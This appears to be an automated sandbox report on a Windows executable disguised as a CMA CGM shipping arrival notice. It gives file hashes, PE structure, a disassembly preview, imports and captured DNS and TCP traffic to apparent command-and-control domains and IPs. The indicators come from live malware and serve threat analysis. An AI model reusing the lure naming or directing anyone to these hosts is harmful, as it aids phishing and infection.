sy9Jg5KNKX.exe | malicious | 91.184.0.38
LVgvHHo8kF.exe | malicious | 91.184.0.38
Ubhsxnuqgxfmriyfpmasjwnnthyabnobhv.exe | malicious | 91.184.0.38
wRMujebgt8.exe | malicious | 91.184.0.38
Uli9VSVMnB.exe | malicious | 91.184.0.38
T0C1sVSC5N.exe | malicious | 91.184.0.38
DZz5X5kGnI.exe | malicious | 91.184.0.38
mi4Y4eUW0R.exe | malicious | 91.184.0.38
buC0s3RzkW.exe | malicious | 91.184.0.38
CF7WxxIWIy.exe | malicious | 91.184.0.38
TvgNQWCnxu.exe | malicious | 91.184.0.38
ifHCyhe8bQ.exe | malicious | 91.184.0.38

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):4.255614019053077
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    File size:466944
                                    MD5:e8bceea59b2074bd08bf68ab55ecdf3e
                                    SHA1:8b62bf811b03fe25924ef6ff4d4afd89c902f7cd
                                    SHA256:0b4684d82509a6e7e0c1cb63174bf68d182ccff75a3d19f16821127605d636b8
                                    SHA512:405f00ffa49ecb3131f0a16afa2b4488c8580c2c8161a0bd4384b9218c9dc74a21812fe6a86f49c16f08959b4743d9f19bb07f7524ce63e6ed339ab01679add1
                                    SSDEEP:12288:8HLEuNNNNN6NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNGvNNNNNNasgTJ4KJ1Z:8HY2csg9h1Z
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W...K...W...u...W...q...W..Rich.W..........................PE..L....f=L.................P..........H........`....@

                                    File Icon

                                    Icon Hash:70f0a231b3b2f071

                                    Static PE Info

                                    General

                                    Entrypoint:0x401448
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x4C3D6691 [Wed Jul 14 07:26:09 2010 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:01b006fd37878659f6f60ca0efdc2460

                                    Entrypoint Preview

                                    Instruction
                                    push 00418BE4h
                                    call 00007FCCF073CF75h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    xor byte ptr [eax], al
                                    add byte ptr [eax], al
                                    inc eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ebx-460B11FDh], bh
                                    sbb al, C4h
                                    dec edi
                                    mov al, byte ptr [9131EA78h]
                                    pop edx
                                    mov edi, 00000000h
                                    add byte ptr [eax], al
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    push ebx
                                    push 00000074h
                                    jc 00007FCCF073CFEDh
                                    imul esp, dword ptr [ebp+6Eh], 64h
                                    jnc 00007FCCF073CF83h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add bh, bh
                                    int3
                                    xor dword ptr [eax], eax
                                    push cs
                                    psubd mm4, mm7
                                    xchg eax, ecx

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x459f4 | 0x28 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x48000 | 0x2a156 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x238 | 0x20 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x134 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x44f28 | 0x45000 | False | 0.271176545516 | data | 4.83437034271 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .data | 0x46000 | 0x148c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x48000 | 0x2a156 | 0x2b000 | False | 0.161876589753 | data | 3.15995554576 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    Name | RVA | Size | Type | Language | Country
                                    RT_ICON | 0x71bee | 0x568 | GLS_BINARY_LSB_FIRST | |
                                    RT_ICON | 0x71786 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                    RT_ICON | 0x710be | 0x6c8 | data | |
                                    RT_ICON | 0x70736 | 0x988 | data | |
                                    RT_ICON | 0x6fe8e | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | |
                                    RT_ICON | 0x6ede6 | 0x10a8 | data | |
                                    RT_ICON | 0x6df3e | 0xea8 | data | |
                                    RT_ICON | 0x6b996 | 0x25a8 | data | |
                                    RT_ICON | 0x6776e | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16711679, next used block 4294934272 | |
                                    RT_ICON | 0x622e6 | 0x5488 | data | |
                                    RT_ICON | 0x58e3e | 0x94a8 | data | |
                                    RT_ICON | 0x48616 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
                                    RT_GROUP_ICON | 0x48568 | 0xae | data | |
                                    RT_VERSION | 0x48300 | 0x268 | MS Windows COFF Motorola 68000 object file | English | United States

                                    Imports

                                    DLL | Import
                                    MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaDateVar, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarCopy, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                    Version Infos

                                    Description | Data
                                    Translation | 0x0409 0x04b0
                                    InternalName | smedesvende
                                    FileVersion | 1.00
                                    CompanyName | Kareo
                                    Comments | Kareo
                                    ProductName | Kareo
                                    ProductVersion | 1.00
                                    FileDescription | Kareo
                                    OriginalFilename | smedesvende.exe

                                    Possible Origin

                                    Language of compilation system | Country where language is spoken | Map
                                    English | United States |

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Sep 13, 2021 22:56:56.874253035 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:56.874305010 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:56.874392033 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:56.911995888 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:56.912024975 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.035204887 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.035644054 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.356076956 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.356105089 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.356489897 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.356590986 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.360095978 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.403137922 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.433618069 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.433661938 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.433687925 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.433775902 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.433809042 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.433825016 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.433842897 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.433902025 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.433959007 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.466226101 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466272116 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466445923 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.466470003 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466509104 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466533899 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466538906 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.466550112 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466635942 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.466847897 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466872931 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466936111 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.466945887 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.466990948 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.499340057 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.499373913 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.499617100 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.499641895 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.499757051 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.499758959 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.499802113 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.499838114 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.499869108 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.499979973 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.499996901 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500094891 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.500149965 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500170946 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500289917 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.500308990 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500411034 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.500426054 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500447989 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500576019 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.500587940 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500629902 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500648022 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500662088 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.500669956 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.500771999 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.501121044 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.501143932 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.501272917 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.501285076 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.501435995 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.502804041 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:56:57.503644943 CEST | 443 | 49817 | 91.184.0.38 | 192.168.2.4
                                    Sep 13, 2021 22:56:57.503792048 CEST | 49817 | 443 | 192.168.2.4 | 91.184.0.38
                                    Sep 13, 2021 22:58:27.578078032 CEST | 49824 | 80 | 192.168.2.4 | 160.153.136.3
                                    Sep 13, 2021 22:58:27.604888916 CEST | 80 | 49824 | 160.153.136.3 | 192.168.2.4
                                    Sep 13, 2021 22:58:27.605011940 CEST | 49824 | 80 | 192.168.2.4 | 160.153.136.3
                                    Sep 13, 2021 22:58:27.605200052 CEST | 49824 | 80 | 192.168.2.4 | 160.153.136.3
                                    Sep 13, 2021 22:58:27.631504059 CEST | 80 | 49824 | 160.153.136.3 | 192.168.2.4
                                    Sep 13, 2021 22:58:27.631721020 CEST | 49824 | 80 | 192.168.2.4 | 160.153.136.3
                                    Sep 13, 2021 22:58:27.631783009 CEST | 49824 | 80 | 192.168.2.4 | 160.153.136.3
                                    Sep 13, 2021 22:58:27.659466982 CEST | 80 | 49824 | 160.153.136.3 | 192.168.2.4
                                    Sep 13, 2021 22:58:48.715173960 CEST | 49825 | 80 | 192.168.2.4 | 44.227.76.166
                                    Sep 13, 2021 22:58:48.898750067 CEST | 80 | 49825 | 44.227.76.166 | 192.168.2.4
                                    Sep 13, 2021 22:58:48.898989916 CEST | 49825 | 80 | 192.168.2.4 | 44.227.76.166
                                    Sep 13, 2021 22:58:49.083728075 CEST | 80 | 49825 | 44.227.76.166 | 192.168.2.4
                                    Sep 13, 2021 22:58:49.083899975 CEST | 49825 | 80 | 192.168.2.4 | 44.227.76.166
                                    Sep 13, 2021 22:58:49.266762972 CEST | 80 | 49825 | 44.227.76.166 | 192.168.2.4
                                    Sep 13, 2021 22:58:49.279829025 CEST | 80 | 49825 | 44.227.76.166 | 192.168.2.4
                                    Sep 13, 2021 22:58:49.279849052 CEST | 80 | 49825 | 44.227.76.166 | 192.168.2.4
                                    Sep 13, 2021 22:58:49.280071020 CEST | 49825 | 80 | 192.168.2.4 | 44.227.76.166
                                    Sep 13, 2021 22:58:49.280203104 CEST | 49825 | 80 | 192.168.2.4 | 44.227.76.166
                                    Sep 13, 2021 22:58:49.462898970 CEST | 80 | 49825 | 44.227.76.166 | 192.168.2.4
                                    Sep 13, 2021 22:59:09.807353020 CEST | 49826 | 80 | 192.168.2.4 | 34.102.136.180
                                    Sep 13, 2021 22:59:09.824464083 CEST | 80 | 49826 | 34.102.136.180 | 192.168.2.4
                                    Sep 13, 2021 22:59:09.824657917 CEST | 49826 | 80 | 192.168.2.4 | 34.102.136.180
                                    Sep 13, 2021 22:59:10.170882940 CEST | 49826 | 80 | 192.168.2.4 | 34.102.136.180
                                    Sep 13, 2021 22:59:10.187973976 CEST | 80 | 49826 | 34.102.136.180 | 192.168.2.4
                                    Sep 13, 2021 22:59:10.286118984 CEST | 80 | 49826 | 34.102.136.180 | 192.168.2.4
                                    Sep 13, 2021 22:59:10.286139011 CEST | 80 | 49826 | 34.102.136.180 | 192.168.2.4
                                    Sep 13, 2021 22:59:10.286314964 CEST | 49826 | 80 | 192.168.2.4 | 34.102.136.180
                                    Sep 13, 2021 22:59:10.286531925 CEST | 49826 | 80 | 192.168.2.4 | 34.102.136.180
                                    Sep 13, 2021 22:59:10.305299997 CEST | 80 | 49826 | 34.102.136.180 | 192.168.2.4
                                    Sep 13, 2021 22:59:30.622541904 CEST | 49828 | 80 | 192.168.2.4 | 209.99.40.222

                                    UDP Packets

                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Sep 13, 2021 22:53:17.570777893 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:17.616097927 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:44.085283041 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:44.120532036 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:45.121459007 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:45.156969070 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:45.888705015 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:45.923012018 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:46.260446072 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:46.295794010 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:46.693938017 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:46.727649927 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:47.301723957 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:47.334827900 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:47.899444103 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:47.925237894 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:47.944386005 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:47.980165005 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:48.700690031 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:48.735284090 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:49.458976030 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:49.485302925 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:53:50.086766005 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:53:50.120359898 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:54:01.290462971 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:54:01.335695982 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:56:56.786725044 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:56:56.835297108 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:57:32.173316956 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:57:32.210340023 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:57:32.929204941 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:57:32.962132931 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:57:37.620874882 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:57:37.654315948 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:57:42.869123936 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:57:42.905035019 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:57:43.128138065 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:57:43.160607100 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:58:27.520945072 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:58:27.570625067 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:58:48.566896915 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:58:48.712940931 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:59:09.748640060 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:59:09.803823948 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:59:25.515871048 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:59:25.561611891 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:59:30.452164888 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:59:30.619622946 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 22:59:51.422689915 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 22:59:51.462614059 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 23:00:11.777059078 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 23:00:11.817277908 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 23:00:34.125072002 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 23:00:34.258972883 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 23:00:54.493113041 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 23:00:54.682140112 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
                                    Sep 13, 2021 23:01:15.200295925 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
                                    Sep 13, 2021 23:01:15.464034081 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4

                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Sep 13, 2021 22:56:56.786725044 CEST | 192.168.2.4 | 8.8.8.8 | 0x86b7 | Standard query (0) | www.paulassinkarchitect.nl | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:58:27.520945072 CEST | 192.168.2.4 | 8.8.8.8 | 0xc89a | Standard query (0) | www.everythingswallow.com | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:58:48.566896915 CEST | 192.168.2.4 | 8.8.8.8 | 0x9da3 | Standard query (0) | www.priorpublic.com | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:59:09.748640060 CEST | 192.168.2.4 | 8.8.8.8 | 0xd210 | Standard query (0) | www.taylormakeyourlife.com | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:59:30.452164888 CEST | 192.168.2.4 | 8.8.8.8 | 0x23c5 | Standard query (0) | www.rlmwebcreations.com | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:59:51.422689915 CEST | 192.168.2.4 | 8.8.8.8 | 0x8a61 | Standard query (0) | www.beckyhartpcpublishers.com | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 23:00:11.777059078 CEST | 192.168.2.4 | 8.8.8.8 | 0x2871 | Standard query (0) | www.dominionhavanese.com | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 23:00:34.125072002 CEST | 192.168.2.4 | 8.8.8.8 | 0x7fe4 | Standard query (0) | www.microsoftjob.com | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 23:00:54.493113041 CEST | 192.168.2.4 | 8.8.8.8 | 0x7b4 | Standard query (0) | www.wxsjykj.com | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 23:01:15.200295925 CEST | 192.168.2.4 | 8.8.8.8 | 0xafef | Standard query (0) | www.acooll.com | A (IP address) | IN (0x0001)

                                    DNS Answers

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                    Sep 13, 2021 22:56:56.835297108 CEST | 8.8.8.8 | 192.168.2.4 | 0x86b7 | No error (0) | www.paulassinkarchitect.nl | | 91.184.0.38 | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:57:32.210340023 CEST | 8.8.8.8 | 192.168.2.4 | 0xfaa | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
                                    Sep 13, 2021 22:58:27.570625067 CEST | 8.8.8.8 | 192.168.2.4 | 0xc89a | No error (0) | www.everythingswallow.com | everythingswallow.com | | CNAME (Canonical name) | IN (0x0001)
                                    Sep 13, 2021 22:58:27.570625067 CEST | 8.8.8.8 | 192.168.2.4 | 0xc89a | No error (0) | everythingswallow.com | | 160.153.136.3 | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:58:48.712940931 CEST | 8.8.8.8 | 192.168.2.4 | 0x9da3 | No error (0) | www.priorpublic.com | | 44.227.76.166 | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:58:48.712940931 CEST | 8.8.8.8 | 192.168.2.4 | 0x9da3 | No error (0) | www.priorpublic.com | | 44.227.65.245 | A (IP address) | IN (0x0001)
